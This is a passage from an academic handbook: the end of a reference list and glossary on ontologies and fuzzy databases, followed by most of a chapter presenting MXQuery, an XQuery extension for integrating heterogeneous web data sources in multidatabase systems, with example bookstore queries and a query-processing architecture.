Based on Human Skill and Knowledge ( IFAC 2003), Goteborg, Sweden. Rodríguez, L. J. T. (2000). Extending RDBMS for allowing fuzzy quantified queries. Proceedings of DEXA 2000, LNCS 1873 (pp. 407-416). Springer-Verlag. Rundensteiner, E. A., Hawkes, L. W., & Bandler, W. (1989). On nearness measures in fuzzy relational data models. International Journal Approximate Reasoning (3), 267-298. Shenoi, S., & Melton, A. (1989). Proximity relations in the fuzzy relational databases. Fuzzy Sets and Systems, 31(3), 285-296. Sheth, A., Ramakrishnan, C., & Thomas, C. (2005). Semantics for the semantic Web: The implicit, the formal, and the powerful. Journal on Semantic Web and Information Systems, 1(1), 1-18. Staab, S., & Studer, R. (Ed.) (2004). Handbook on ontologies. Springer. Stanford Medical Informatics at the Stanford University School of Medicine. (n.d.). Protégé. Retrieved from http://protege.stanford.edu/ Stanford University. (n.d.). Ontolingua. Retrieved from http://www.ksl.stanford.edu/software/ontolingua/ Steve, G., Gangemi, A., & Pisanelli, D. (1998). Ontology integration: Experiences with medical ontologies. In N. Guarino (Ed.) Formal ontology in information systems, ( pp. 163-178). IOS Press. Studer, R., Benjamins, V., & Fensel, D. (1998). Knowledge engineering: Principles and methods. IEEE Transactions on Data and Knowledge Engineering, 25(1-2), 161-197. Su, X., & Ilebrekke, L. (2002). A comparative study of ontology languages and tools. Proceedings of CAiSE 2002 (pp. 761-765).
2470
Trinh, Q., Barker, K., & Alhajj, R. (2006). RDB2ONT: A tool for generating OWL ontologies from relational database systems. Proceed ings of AICT/ICIW (p. 170). IEEE Computer Society. Umano, M., & Fukami, S. (1994). Fuzzy relational algebra for possibility-distribution-fuzzy-relational model of fuzzy data. Journal of Intelligent Information Systems, 3, 7-28. Unchold, M., & Gruninger, M. (2004). Ontologies and semantics for seamless connectivity. SIGMOD Record, 33(4), 58-64. Upadhyaya, S. R., & Kumar, P. S. (2005). ERONTO: A tool for extracting ontologies from extended E/R diagrams. Proceedings of the 2005 ACM Symposium on Applied Computing (SAC ’05) (pp. 666–670). New York: ACM Press. Yabloko, Len, & Next Generation Software. (n.d.). OntoBase plug-in for Protégé. Retrieved from http://www.ontospace.net/pages/3/index.htm Zadeh, L. A. (1965). Fuzzy sets. Information and Control, 83, 338-353.
KEY TERMS

Ontologies: An ontology is a data model that represents a domain and is used to reason about the objects in that domain and the relations between them.

Database Schemas: A database schema is a description of the structure of a database or a directory (file systems); these can be: (a) conceptual schema, a map of concepts and their relationships; (b) logical schema, a map of entities and their attributes and relations; and (c) physical schema, a particular implementation of a logical schema.

SQL: SQL is the most popular computer language used to create, modify, retrieve, and manipulate data from relational database management systems.

Semantic Web: The Semantic Web is a project that intends to create a universal medium for information exchange by putting documents with computer-processable meaning (semantics) on the World Wide Web.

Database Catalog: The database catalog of a database instance consists of metadata in which definitions of database objects such as base tables, view tables, synonyms, value ranges, indexes, users, and user groups are stored.

OWL: A markup language for publishing and sharing data using ontologies on the Internet. OWL is a vocabulary extension of the Resource Description Framework (RDF) and is derived from the DAML+OIL Web Ontology Language (see also DAML and OIL). Together with RDF and other components, these tools make up the Semantic Web project.

Data Mapping: The process of creating data element mappings between two distinct data models. Data mapping is the first step in creating a data transformation between a data source and a destination.

Schema Integration: A process that takes two schemas as input and produces a mapping between the elements that correspond to each other semantically.

Fuzzy Database Management System: A system or software designed to manage a relational database and run operations on the data requested by numerous clients, extended in order to also manage fuzzy data.

Heterogeneous Data Integration Tools: Tools that provide translation and integration for data sources over schemas of different kinds.
This work was previously published in the Handbook of Research on Web Information Systems Quality, edited by C. Calero, M. Moraga, and M. Piattini, pp. 301-323, copyright 2008 by Information Science Reference (an imprint of IGI Global).
Chapter 8.6
Integrating Heterogeneous Data Sources in the Web

Angelo Brayner, University of Fortaleza, Brazil
Marcelo Meirelles, University of Fortaleza, Brazil
José de Aguiar Moraes Filho, University of Fortaleza, Brazil
ABSTRACT

Integrating data sources published on the Web requires an integration strategy that guarantees the local data sources' autonomy. A multidatabase system (MDBS) has been consolidated as an approach to integrate multiple heterogeneous and distributed data sources in flexible and dynamic environments such as the Web. A key property of MDBSs is to guarantee a higher degree of local autonomy. In order to adopt the MDBS strategy, it is necessary to use a query language, called the MultiDatabase Language (MDL), which provides the necessary constructs for jointly manipulating and accessing data in heterogeneous data sources. In other words, the MDL is responsible for solving integration conflicts. This chapter describes an extension to the XQuery Language,
called MXQuery, which supports queries over several data sources and solves such integration problems as semantic heterogeneity and incomplete information.
INTRODUCTION The Web (World Wide Web) can be seen as a wide network consisting of the union of several local area networks (LANs) spread over the entire world. However, the local networks that constitute the Web are autonomous and capable of plugging or unplugging themselves into and from the Web at any time. Over the last few years, the Web has been used to publish several databases. Of course, databases available on the Web are heterogeneous since they
might be defined by using different data models (e.g., relational or object data model), managed by different database systems (DBSs), or running in different computational environments (regarding operating system and hardware). Furthermore, the integration of databases on the Web should be realized without interfering in the management and processing of local data. In other words, databases should be integrated preserving the local autonomy of each database. Despite the fact that heterogeneity and the autonomy of multiple databases on the Web is a reality nowadays, users (and applications) need shared access to those databases. Thus, it is possible to submit queries against several heterogeneous databases located in distinct local networks throughout the Web. Consequently, integrating databases published on the Web has become a challenge to the database technology. Several approaches for integrating heterogeneous and autonomous data sources have been proposed since the late ’80s. In this chapter, we propose a strategy based on the multidatabase approach for integrating heterogeneous databases published on the Web. For that reason, we describe a new MultiDatabase Language (MDL), called MXQuery, since the proposed strategy uses XML (extensible markup language) as the common data model (CDM; conceptual schema) to represent the multiple data sources’ schemas. The MXQuery, which is an extension to the XQuery Language, provides constructors and operators for supporting queries over multiple heterogeneous data sources. The MXQuery solves integration problems such as semantic heterogeneity and incomplete information. Furthermore, this chapter presents an architecture to process MXQuery queries. This chapter is organized as follows. Approaches for integrating heterogeneous data sources are studied next. Then, related work is discussed, followed by a description of the MXQuery MultiDatabase Language. Next we present in detail the features of the proposed integration strategy, and then give an overview of the
query-processor architecture for the MXQuery Language. Finally, we conclude the chapter.
DATA-INTEGRATION APPROACHES

Federated Databases

Federated database is an approach for integrating heterogeneous databases. In a federation of databases, there is a federated schema global to all local component databases. With a federated schema, users make use of an external schema to submit data queries and updates. The federated schema suffers from the (local to global) schema-evolution drawback. In other words, an evolution (modification) of a local schema demands a corresponding modification of the federated (global) schema and can bring about a consistency-loss risk. Federated schema is static in the sense that its maintenance is up to a database administrator (DBA). In general, the federated schema is stored as part of each component database.
Mediators

Motivated by the Web, several research works (Bouganim, Fabret, Mohan, & Valduriez, 2000; Chen, DeWitt, Tian, & Wang, 2000; Das, Shuster, & Wu, 2002; Goldman & Widom, 2000; Manolescu, Florescu, & Kossman, 2001) have focused on the issue of using mediators for integrating databases available on the Web. Mediators are usually specialized software components (and/or engines) for integrating data. A mediator provides a set of virtual views over different sources, called mediated schema, so that it does not change any local database (LDB) schemas. It provides a service for hiding all data characteristics from its users, allowing them to get data in a uniform way. With respect to the task of building an integrated view (federated or mediated schema), there are three different strategies. The first is
global-as-view (GAV), which is also called the global-schema-centric approach. The global schema is described as a view over the local schemas. In other words, each component of the global schema is defined in terms of the source schemas. Next is local-as-view (LAV), which is also called the source-centric approach. Local schemas are described as views over the global schema. In other words, the mappings may define the components of each source schema in terms of the global schema. Third is generalized local-as-view (GLAV), which is a mixed approach that consists of associating views over the global schema with views over local schemas.
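As a rough illustration of the GAV strategy (a minimal sketch, not taken from the chapter; the documents s1.xml and s2.xml and their element names are hypothetical), the global schema can be defined directly as an XQuery view over the local sources, whereas under LAV each local source would instead be described as a view over such a global schema:

(: GAV-style mediated view: the global <books> element is defined as a query over two local sources :)
<books>{
  for $l in doc("s1.xml")//livro
  return <book><title>{ data($l/titulo) }</title></book>,
  for $b in doc("s2.xml")//book
  return <book><title>{ data($b/title) }</title></book>
}</books>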
Multidatabase

An approach for integrating databases is the multidatabase technology, whose key feature is to provide interoperability among multiple heterogeneous and autonomous databases without attempting to integrate them by means of a single global schema (Elmagarmid, Rusinkiewicz, & Sheth, 1999). A multidatabase consists of a collection of autonomous databases, called local databases. Systems used to manage multidatabases are called multidatabase systems (MDBSs). An MDBS should provide full database functionality and is built on top of multiple DBSs, called local DBSs (LDBSs), each of which operates autonomously. Local autonomy is a key feature of the multidatabase technology. In an MDBS, the multidatabase language plays a key role since it guarantees database integration and interoperability. Roughly speaking, an MDL represents simultaneously the DDL and the DML of an MDBS. Notwithstanding, the MDL should provide additional features not provided by existing database languages (e.g., SQL). An example of such a feature is the ability to use logical database names for qualifying data in different databases. This is because the multidatabase approach shifts the integration task from global DBAs to users and
local DBAs. Therefore, a global query should contain the necessary information for manipulating local data. This implies that the user knows what information is required and where it can be found. For that reason, it is important that an MDBS offers a tool, for example, an object browser, to help the user to obtain this knowledge. For a detailed discussion about multidatabase languages, the reader is referred to Domenig and Dittrich (2000), Elmagarmid, Bouguettaya, and Benatallah (1998), Grant, Litwin, Roussopoulos, and Sellis (1993), and Özsu and Valduriez (1999). In a context where the integration should be carried on in flexible and dynamic environments such as the Web and a high degree of autonomy of each local database is critical, the multidatabase approach is quite adequate. On the other hand, XML provides quite a natural way to be used as a common data model for data integration. It is powerful enough to represent structured, unstructured, and semistructured data. Moreover, its related technologies, such as DOM, XML schema, and XQuery, can contribute to the development of a standard mapping language. Therefore, in order to adopt the MDBS strategy to access data stored in data sources available on the Web, it is necessary to use a multidatabase language that (a) can support the capability to jointly manipulate data in different data sources and (b) can be based on the XML data model since XML is almost a de facto standard for data representation on the Web.
RELATED WORK Several MDLs have been proposed in order to provide support for accessing distributed and heterogeneous data sources. In Grant et al. (1993) and Litwin, Abdellatif, Zeroual, Nicolas, and Vigier (1989), an MDL called MSQL is proposed. In order to integrate heterogeneous databases by means of MSQL, the relational data model is used as the
CDM. Although MSQL is more expressive than SQL, the language is quite limited in its ability to deal with structural incompatibilities. MSQL introduces semantic variables. However, such variables are only responsible for solving name conflicts (synonymous and homonymous). Furthermore, the join operation among databases is limited to domain-compatible operations (Missier & Rusimkiewicz, 1995). Finally, another limitation of MSQL, pointed out by Krishnamurthy, Litwin, and Kent (2001), is its inability to cope with schematic discrepancies or structural conflicts. As already mentioned, in order to use MSQL, it is necessary to adopt the relational model as the conceptual data model. In other words, MSQL allows only queries on relational schemas. Mapping a postrelational data model, such as a semistructured data model, into such a rigid data model is quite a complex task. Therefore, MSQL is not efficient for integrating data sources based on the Web. The work proposed by Missier and Rusimkiewicz (1995) defines global attributes that will represent the integration result from a query. Then, declarative instructions are used to map the attributes of the local databases to these global attributes. After the mapping definition (query context), one can submit queries against the data sources using a language borrowed from SQL. Furthermore, the queries can use implicit joins, which makes these queries more powerful and result oriented. The IDL language, presented by Krishnamurthy et al. (2001), allows solving the problems addressed by the MSQL language; however, the main contribution of the IDL is coping with structural conflicts, called schematic discrepancies (Krishnamurthy et al.). Although a part of these problems can be solved by the MSQL language, other kinds of problems cannot, for instance, integrating data represented as data in one schema and as metadata in another schema. Both approaches presented by Krishnamurthy et al. and Missier
and Rusimkiewicz (1995) are more expressive than the MSQL language. However, they are still limited by the relational data model. Domenig and Dittrich (2000) present an OQL-like language in which the data can be visualized at different conceptual levels. Such conceptual levels arrange the data from distinct data sources according to similar features. This conceptual-level presentation is called data space, which is used for integrating structured, semistructured, and unstructured data. Since the OQL language presents mechanisms to query structured data sets, these mechanisms cannot be used to query over unstructured or semistructured data. For that reason, the authors present an extension to the OQL, called SOQL (Domenig & Dittrich, 2000). The SOQL approach defines two distinct steps for integrating data sources. In the first one, called preintegration, the DBAs identify similarities and conflicts among data sources and then specify correspondence rules among the schemas (query context). In the second step, called integration, the final schema is built from the correspondence rules. Despite the flexibility of that approach, it is necessary to build a (global) schema before submitting queries. Moreover, the schema must be rebuilt each time a new correspondence rule or a new data source comes into the multidatabase community. The approach proposed by Sattler, Conrad, and Saake (2000), called FRAQL, is similar to the approach presented in Missier and Rusimkiewicz (1995). The FRAQL language uses declarative instructions that make it possible to map objects from a local schema into objects of a global schema (Sattler et al., 2000). Initially, a global schema is defined, which will be used by the users to submit queries. Then, the local schemas are mapped according to the global schema, where it is possible to use user-defined functions if necessary. The correspondence between local and global schemas defines the query-execution context. The queries are submitted over the global
schema and then are translated into subqueries using the predefined mapping. Differently from the approach adopted in Domenig and Dittrich (2000), the FRAQL approach does not require one to rebuild the global schema whenever a new data source comes into the community. However, it is necessary to define a mapping between local and global schema before one can submit a query. The XQuery Language (Boag et al., 2003; Chamberlin, Robie, & Florescu, 2000; Robie, Chamberlin, & Florescu, 2000) has several features that allow querying XML documents and presenting a new XML document as a result. This new XML document can be a subtree of the original XML document or can present a different structure. These features make the XQuery Language quite expressive and powerful. Furthermore, it is possible to submit queries against multiple data sources. Although it is possible to represent union and join operations between these data sources, the XQuery Language does not present any mechanism for solving integration conflicts. Thus, XQuery queries presume that distinct data sources were created in a single data-source design. The XQuery Language allows element construction, which makes it possible to compensate for the absence of mechanisms for conflict resolution. Despite the fact that element constructors offer some facilities to solve conflicts, they do not give a formal mapping among attributes from distinct data sources. Therefore, such constructors do not define, in a simple way, the conceptual relationship among these data sources. Consequently, XQuery queries that access data in several data sources on the Web become quite complex. Moreover, the XQuery Language does not cope with the connection and disconnection of data sources. This feature is essential in dynamic environments such as the Web and ad hoc networks.
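For instance (a sketch in plain XQuery, not taken from the chapter; the documents and element names anticipate the bookstore example presented later in the chapter), resolving a synonym conflict between livro/titulo and book/title, converting prices, and joining the two sources on their ISBN must all be spelled out by hand with element constructors:

(: manual integration in plain XQuery: the synonym conflict (titulo/title), the domain
   conflict (price conversion), and the join condition are all written out explicitly :)
for $l in doc("d1.xml")//livro, $b in doc("d2.xml")//book
where $l/@isbn = $b/isbn
return
  <book isbn="{ $l/@isbn }">
    <title>{ data($l/titulo) }</title>
    <price>{ $l/preco div 2.98 }</price>
  </book>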
MXQUERY The proposed MDL, MXQuery, extends the XQuery Language by introducing constructors and operators for supporting queries over multiple heterogeneous data sources. MXQuery should be used in the MDBS context, where local data sources are viewed as XML documents. MXQuery provides mechanisms for coping with semantic heterogeneity and incomplete information during the execution of queries over heterogeneous data sources. The XQuery Language is focused on querying semistructured data and, therefore, it presents flexible structures to identify the required information and arrange them according to the user’s specification. The MXQuery Language incorporates these features and introduces mapping declarations among distinct data sources to represent the conceptual relationship among those data sources. The idea behind MXQuery is to use mapping declarations among the data sources to one or more elements of an XML document, which will contain the query result. The mapping process is expressed in the query itself, making the MXQuery Language more flexible than the approaches presented in Missier and Rusimkiewicz (1995) and Sattler et al. (2000). Moreover, it is possible to use result variables, which represent the result XML document, and data-source variables, which represent the data sources, in the WHERE-clause specification. Thus, one may introduce filters (conditions) over data already integrated and/or over local data sources. For that reason, the existing conditions in the query are evaluated in two distinct moments. Conditions over local data sources are inserted in the subqueries submitted to the data sources. Conditions over integrated data are evaluated after the global result construction; that is, it is possible that the query postprocessor excludes elements after a condition evaluation. For instance, the
expression "WHERE $p/book/year > '1999'," in which $p represents a result XML document, is evaluated after the data integration. Thus, useless data traffic could be generated: <book> elements whose <year> subelements have values not greater than 1999 are sent to the query manager (QM), and only after data integration are these elements discarded. However, in the MXQuery approach, the MDBS architecture tries first to transform the conditions over integrated data into conditions over local data sources. Such a simplification could reduce the data traffic. Differently from the approaches proposed in Domenig and Dittrich (2000), Missier and Rusimkiewicz (1995), and Sattler et al. (2000), the MXQuery Language does not require a query context definition. Thus, queries expressed in MXQuery are more dynamic and, consequently, they suffer less from the influence of local schema evolutions and of the connection and disconnection of new data sources. Therefore, when an MXQuery query is submitted, all information about how to integrate the local data sources is represented in the query. Coping with incomplete information is a great challenge for processing queries that access multiple heterogeneous data sources (Abiteboul, Segoufin, & Vianu, 2001; Tomasic, Raschid, & Valduriez, 1996). To solve this problem, MXQuery makes it possible to identify in a query what information is mandatory for the user. Nonmandatory information is considered as backing information. When such information is not available or even incorrectly defined, it is not returned in the query result. Consequently, the query processor can change the original query to remove any reference to an optional data source when the referenced source is unavailable at the moment of the query evaluation.
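A sketch of this transformation in plain XQuery terms (illustrative only; the rewriting rules themselves are not given in the chapter, and the element names follow the bookstore example used later):

(: the filter $p/book/year > '1999', originally stated over the integrated result,
   is pushed down into equivalent filters shipped inside the local subqueries :)
(
  for $l in doc("d1.xml")//livro where number($l/ano) > 1999 return $l,
  for $b in doc("d2.xml")//book where number($b/year) > 1999 return $b
)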
EFLWOR Expressions MXQuery introduces the notion of EFLWOR (each FLWOR) expressions, an extension to the
concept FLWOR expressions in the XQuery syntax. An EFLWOR expression has the functionality of traversing all elements of trees that represent XML documents. Recall that XML documents represent, in turn, a local data source in an MDBS. It is important to note that in the proposed integration strategy, each data source is viewed as an XML document. The result of an EFLWOR is represented by a tree as well, called a result tree. The result tree is produced through the union, join, and/or fusion (algebraic) operations over elements belonging to distinct XML documents, each of these representing a distinct local data source. Before defining those operations, it is important to define the concept of equivalence between two XML elements. Two XML elements are said to be equivalent if they have the same value for a given attribute, defined as a matching attribute. The idea behind the concept of XML-element equivalence is to identify elements that represent the same entity of the real world. The union operation is a binary operation in which the operands are XML documents. The union operation represents the less restrictive way to build a result tree for queries over heterogeneous data sources since it does not require type compatibility (as required in the relational data model, for example) between the operands. The union of two XML documents in MXQuery has the semantic of enclosing the operands as children of the root node of the result tree. The join operation in an MXQuery expression can be implicit or explicit. An implicit join is specified when the dereference operator is used in a path expression. An explicit join has the same semantic of a theta join of the relational algebra. For that reason, it is necessary to use a WHERE clause to specify the join condition in order to identify whether or not elements belonging to a distinct document satisfy the join condition. It is important to note that it is not possible to use the dereference operator for jointly manipulating distinct data sources. Consequently, only the ex-
plicit join can be used to perform joins between elements belonging to distinct data sources. The fusion operation is similar to the concept of the full outer join of the relational algebra. The result tree produced by a fusion operation encloses all elements belonging to distinct documents (data sources) that satisfy a join condition and the ones that do not satisfy that condition. Query 1 (under
“Using MXQuery” later in the chapter) illustrates a fusion operation. Since MXQuery extends XQuery, part of the MXQuery’s grammar can be found in Boag et al. (2003). Therefore, Table 1 extends the syntax description of the XQuery Language by introducing the EFLWOR expressions. The first column presents sequential numbers that represent clauses
of XQuery's grammar (Boag et al.). In the table, the elements 144 to 147 have been inserted in the original XQuery grammar. The elements 42, 43, 44, 45, 46, 47, and 122 replace the elements from the original grammar. The EFLWOR expression from the MXQuery Language introduces the following new clauses: EACH, ALIAS, EQUAL, FULL, NULL, HIDE, and KEY. These clauses are used to identify the queried data sources and to specify the mapping between local attributes (from the local data sources) and global attributes (from the result tree).

EACH. The EACH clause binds values to one or more variables, denoted as result variables. Such variables are used to construct the result tree that represents the result of the integrating process of the integration mechanism. For example, the clause "EACH $p" defines that a variable $p will contain the result of a query over multiple heterogeneous data sources. The rules for the integrating process (such as rules for conflict resolution) should be specified in other declarations of an MXQuery expression. A variable bound in an EACH clause is a well-formed XML document. For that reason, such a variable can be used in any other MXQuery clause that accepts a tree as an input parameter.

ALIAS. This clause specifies one or more variables, denoted as source variables, representing an XML tree (document), which in turn represents a data source in the MXQuery integration strategy. Variables specified in an ALIAS clause can be used by any EFLWOR declaration that accepts a tree as an input parameter. In order to illustrate the use of an ALIAS clause, consider the following MXQuery expression: "ALIAS document('d2.xml')/lib $d2." This expression defines a variable $d2 that represents a data source represented by the document d2.xml. The document function defined in Boag et al. (2003) identifies an XML document that represents one local data source. Moreover, this function indicates the entry point in a forest of nodes of an XML document. The declaration order of the ALIAS clauses in an MXQuery expression specifies the priority of the data sources involved in the query. The priority order specified in an ALIAS clause will be used to solve value conflicts (Sattler et al., 2000), in which the values from elements belonging to data sources with a higher order of priority will be considered as valid values. For example, the first ALIAS declaration identifies the data source that has the higher priority.

EQUAL. The optional EQUAL clause specifies rules for integrating elements belonging to distinct documents (data sources). This clause is responsible for resolving most of the integration conflicts. The key idea of an EQUAL clause is to specify semantic relationships among elements of distinct documents. For example, in the MXQuery expression "EQUAL $d1/livro $d2/book IS $p/book," it is specified that the <livro> element of document $d1 and the <book> element of document $d2 represent the same concept of the real world; that is, they are synonyms. For that reason, the <livro> element and the <book> element will appear in the result as the <book> element. The specification of an EQUAL clause can be shortened. For example, in the expression "EQUAL $d1/livro $d2/book IS $p/book," this can be done by omitting the <book> element of document $d2 since it has the same name as the new element (the <book> element of $p). The shortened declaration is the following: "EQUAL $d1/livro IS $p/book." In Query 1 (see "Using MXQuery" later in the chapter), one can observe the use of the abbreviation mechanism in an EQUAL clause. Normally, only elements referenced in some EQUAL-clause declaration will compose the variable specified in the EACH clause (see the definition of the FULL clause).

FULL. The optional FULL clause can be used in association with the EACH clause. This clause specifies that all elements from all data sources declared in the ALIAS clauses will compose the result tree even though they are not declared in the EQUAL clause. If one does not specify any type of restriction (filter), then a FULL clause produces the UNION of all documents referenced in the query.

NULL. The optional NULL clause can be used in association with the ALIAS clause. This clause specifies that a document is nonmandatory for the query result. Consequently, if a data source is unavailable or is not correctly declared in the query (e.g., incorrect path expression), then any declaration referring to this data source (or to some element belonging to it) will be ignored. For example, in a query that contains the MXQuery expression "ALIAS document('d2.xml')/lib $d2 NULL," the document d2.xml is defined as nonmandatory for the query result. In this case, even if the data source corresponding to the document d2.xml is unavailable, the query is still processed. In the same way, elements belonging to d2.xml that appear in other declarations of the same query will be suppressed. For instance, the declaration "EQUAL $d1/livro $d2/book IS $p/book" in the same query would be processed as if the element $d2/book were not part of the expression. This makes it possible for schema evolution in local data sources not to imply aborting a query. This property is important for flexible and dynamic environments such as the Web.

HIDE. The optional HIDE clause can be used in association with the EQUAL clause. This clause indicates that the elements declared in the EQUAL clause will not appear in the result tree. For example, consider the declaration "EQUAL $d2/book/year $d1/livro/ano IS $p/book/year HIDE" in a given query. The element book/year (the result of the resolution of a synonyms conflict) can be referenced in other clauses; however, it will not be part of the result tree. The HIDE clause has precedence over the FULL clause; that is, an element that uses the HIDE clause will not compose the presented result tree even though it has been used by the FULL clause.

KEY. The optional KEY clause can be used in association with the EQUAL clause. It indicates that the specified elements represent matching attributes. This is done by matching properties of distinct documents. For example, in "EQUAL $d1/livro/@isbn $d2/book/isbn IS $p/book/isbn KEY," the documents d1.xml and d2.xml produce a new element book/isbn, which behaves as a matching attribute for the elements of the original documents ($d1 and $d2).
NAME(n) Function

The NAME(n) function was incorporated from the XQuery Language (Boag et al., 2003). However, in the XQuery Language, it is only responsible for identifying a data origin. In other words, that function returns the name of the data assigned to n. MXQuery also incorporates the NAME(.n) function. This function returns the container of the data specified by n. In a hierarchy, the term container represents the upper object to a specific object. For example, in a relational database, a table behaves as the container of attributes, while the database behaves as a table container. It is also possible to nest the NAME(.n) function. For example, NAME(.NAME(.n)) returns the container of the container of n.
Using MXQuery In this section, the applicability of the MXQuery Language is illustrated. Consider that two bookstores (B1 in Brazil and B2 in New Zealand) decide to jointly offer their books on the Web. However, they have decided as well that each bookstore manages its own data source. In other words, local autonomy should be preserved. Now, suppose that the data sources belonging to the bookstores are heterogeneous. Therefore, the idea is to integrate heterogeneous data sources without violating the local autonomy of each data source. For that reason, the bookstores’ managers have decided to use the MDBS technology for integrating the heterogeneous data sources. Each local data-source schema should be represented in XML schema (Elmagarmid et al., 1998). The document d1.xml
(see Appendix A) represents part of a relational database in which data of the bookstore B1 are stored. The document d2.xml represents data of bookstore B2, which are stored in a data source that cannot be characterized as a database system (for example, HTML documents). Query 1. A Brazilian customer wants to search for the title, author, and price of all books in the bookstores B1 and B2. For this query, the ISBN should be used as a matching attribute. A possible MXQuery expression is presented in Figure 1. The execution of Query 1 returns a variable $p that contains <book> elements from documents d1.xml and d2.xml (specified in the ALIAS clauses), each of which contains the <title>, <author>, <price>, and <isbn> subelements. The result of this query is bound to an element whose root element is defined by the declaration of the RETURN clause. It is important to note that the expression "EQUAL $d1/livro/titulo $d2/book/title IS $p/book/title" specifies that livro/titulo and book/title are synonyms, representing, therefore, the same concept of the real world. This shows that MXQuery provides the necessary support to users in order to define directives for solving semantic conflicts. Note that in the expression "EQUAL ($d1/livro/preco / 2.98) IS $p/book/price," a currency conversion is made (in this example, from real to dollar). Therefore, this conversion function solves
a domain conflict existing between both data sources specified in Query 1. Other arithmetical operators can be used to produce any kind of conversion function. Observe that the KEY clause is used to specify the matching attribute, in this case, the ISBN. By doing this, it is possible to specify when books that are stored as different objects represent, in fact, the same entity of the real world. In this case, a fusion operation should be applied over those objects. Observe that in Query 1 the equivalence declarations for author and price are in the shortened form. It is important to note that this fact does not cause any impact on the query result. The query result corresponds to a <book> element composed of four subelements. Query 2. A customer wants to search the titles of all books published after 1999 in the databases of the bookstores B1 and B2. For this query, the ISBN should be used as the matching attribute. The MXQuery expression shown in Figure 2 can be used to express this query. Query 2 is similar to Query 1; however, the equivalence declaration of the <ano> subelement with the <year> subelement was added, thereby solving a synonyms conflict. Observe that, different from the equivalence declarations of subelements specified in Query 1, the declaration specified in Query 2 does not determine that the <year> subelement composes the result of this query.
Figure 1. MXQuery expression for Query 1
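A possible form of Query 1, assembled from the clause examples quoted in the prose (the original figure content is not reproduced; the entry path for d1.xml, shown as /livraria, and the final RETURN clause are assumptions):

EACH $p
ALIAS document('d1.xml')/livraria $d1
ALIAS document('d2.xml')/lib $d2
EQUAL $d1/livro/@isbn $d2/book/isbn IS $p/book/isbn KEY
EQUAL $d1/livro/titulo $d2/book/title IS $p/book/title
EQUAL $d1/livro/autor IS $p/book/author
EQUAL ($d1/livro/preco / 2.98) IS $p/book/price
RETURN <result>{ $p/book }</result>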
Figure 2. MXQuery expression for Query 2
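Likewise, a possible form of Query 2, assembled from the clauses discussed in the text (again, the d1.xml entry path, the WHERE comparison, and the RETURN clause are assumptions; the NULL and HIDE declarations are the ones the discussion below relies on):

EACH $p
ALIAS document('d1.xml')/livraria $d1
ALIAS document('d2.xml')/lib $d2 NULL
EQUAL $d1/livro/@isbn $d2/book/isbn IS $p/book/isbn KEY
EQUAL $d1/livro/titulo $d2/book/title IS $p/book/title
EQUAL $d2/book/year $d1/livro/ano IS $p/book/year HIDE
WHERE $p/book/year > '1999'
RETURN <result>{ $p/book/title }</result>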
This is because the HIDE clause was used. The idea is to use the <year> subelement (after the resolution of the synonym conflict) for performing a query filter, which was specified in a WHERE clause. As in the scenario presented in Appendix A, there is a value conflict between two of the <book> elements that should compose the result tree of this query. Two elements have the same ISBN; however, they have <ano> and <year> subelements with distinct values. In document d1.xml, the <ano> subelement is equal to 2001. On the other hand, in document d2.xml, the same object has a <year> element with a value equal to 1999. Furthermore, the <titulo> subelement is presented in Portuguese in document d1.xml, and the <title> subelement is presented in English in document d2.xml. These value conflicts are solved by indicating the data source whose contents must prevail over the other one. This indication is made through the declaration order of the participant data sources. In Query 2, the data source specified by the variable $d1 is prioritized; that means that, in case of a value conflict, its content will be preserved. Due to this fact, the integration result between the data sources d1.xml and d2.xml determines that the value of the <year> subelement must be equal to 2001, and the <title> subelement must appear in the query result in Portuguese.
The use of a NULL clause in Query 2 determines that the nonavailability of the document d2.xml during the query execution does not prevent the query from producing a result. Coincidentally, the presented result is the same independent of the availability of d2.xml; however, its nonavailability would cause an error if the NULL clause were not specified.
INTEGRATION STRATEGY Since we are proposing the use of the MDBS technology as an integration strategy for heterogeneous data sources, in Figure 3 is depicted an abstract model of the proposed architecture for integrating data stored in heterogeneous, distributed, and autonomous data sources. In Figure 3, the query user interface (QUI) does the mediation between the user and the integration architecture, being responsible for receiving queries and presenting the query results. A user who wishes to access multiple integrated data sources through this architecture must send a query using MXQuery syntax, called global query. After that, global queries are sent to the QM. The main function of this component is to divide a global query into subqueries and to send them to the corresponding data sources.
Figure 3. Integration-mechanism architecture
The query manager is divided into three main components, which are the query processor (QP), the location processor (LP), and the query postprocessor (QPp). The query processor receives queries expressed in MXQuery syntax, identifies the data sources referenced, simplifies and optimizes the global queries, generates the subqueries, and finally sends these subqueries to the corresponding data sources. The location processor plays an auxiliary role for the query processor since it has to locate the referenced data sources and report location errors. Location errors can mean the nonavailability of some referenced data source. Such information is useful in the query-simplification process because the inaccessible data sources must be excluded from the query. The exclusion process of a data source from a query must obey the rules established in the query itself. If it is possible to exclude the data source, then all expressions that refer to the excluded data source should be excluded too. The data sources that can be excluded are identified in the MXQuery syntax using the NULL clause.
Subqueries are sent to XML interfaces, by which they are translated into a native query language and directed to the local data sources corresponding to the XML interfaces. Therefore, a query has an XML interface associated with each local data source. The role played by an XML interface will be discussed later. After local processing, the result of a subquery is sent to the XML interface, where it is translated (into XML format) and directed to the query postprocessor. This component must use the rules established in the original query for conflict resolution. For example, a rule can be established to solve problems of synonyms using the EQUAL expression. Therefore, the user is capable of supplying information to the query postprocessor; thus, the QPp can solve conflict problems using the MXQuery syntax. After the conflict resolution, the QPp must combine the results from the diverse subqueries received using the rules established in the original query for result construction. The combined result
of the subqueries is, finally, directed to the query user interface. The source register (SR) is responsible for controlling the connection and disconnection of the participant data sources from the MDBS. This component receives requests from a local data source for participating in the MDBS, registers the physical location of the data sources (uniform resource locator, URL), and publishes the local data sources' schemas. The MDBS repository stores control data of the MDBS, which may include the metadata from the participant data sources, definitions of the MDBS (for example, local data sources or preformatted queries), and the physical location of participant data sources. An XML interface is responsible for mapping the local data sources' schemas into a common data model (conceptual schema). In the proposed architecture, the conceptual schemas must be represented through XML schemas defined using the XML Schema language, a language for schema definition for XML data (Fallside, 2001). Some proposals for mapping data stored in conventional databases into XML documents have been published and implemented, such as, for example, the XDK for PL/SQL tool from Oracle (XDK: Oracle XML Developer's Kit for PL/SQL, 2003).
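As an illustration (a minimal sketch, not part of the chapter; the element names follow bookstore B1's d1.xml and the datatypes are guesses), the XML interface of B1 could publish a conceptual schema along these lines:

<?xml version="1.0"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <!-- each record of B1's relational source is exposed as a <livro> element -->
  <xs:element name="livro">
    <xs:complexType>
      <xs:sequence>
        <xs:element name="titulo" type="xs:string"/>
        <xs:element name="autor" type="xs:string" maxOccurs="unbounded"/>
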